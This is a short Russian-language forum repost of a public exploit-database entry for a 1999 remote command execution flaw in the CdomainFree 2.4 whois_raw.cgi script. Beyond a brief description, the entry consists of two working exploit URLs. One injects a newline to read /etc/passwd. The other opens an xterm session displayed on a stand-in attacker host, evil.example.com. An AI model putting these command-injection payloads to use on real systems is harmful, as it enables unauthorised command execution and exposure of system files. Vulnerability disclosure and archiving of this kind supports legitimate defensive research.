Exploit CdomainFree 2.4 - Remote Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19242
Проверка EDB
  1. Пройдено
Автор
SALVATORE SANFILIPPO -ANTIREZ-
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-1999-1063
Дата публикации
1999-06-01
CdomainFree 2.4 - Remote Command Execution
Код:
source: https://www.securityfocus.com/bid/304/info

A vulnerability in a CGI program part of CdomainFree allows remote malicious users to run any executable already existing to the machine.

The vulnerability is in the whois_raw.cgi program. This CGI passes user input to the shell without proper filtering. None of the Cdomain commercial version (e.g. CdomainPro) are vulnerable as they connect the the whois servers directly. 

http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com:0
 
Источник
www.exploit-db.com

Похожие темы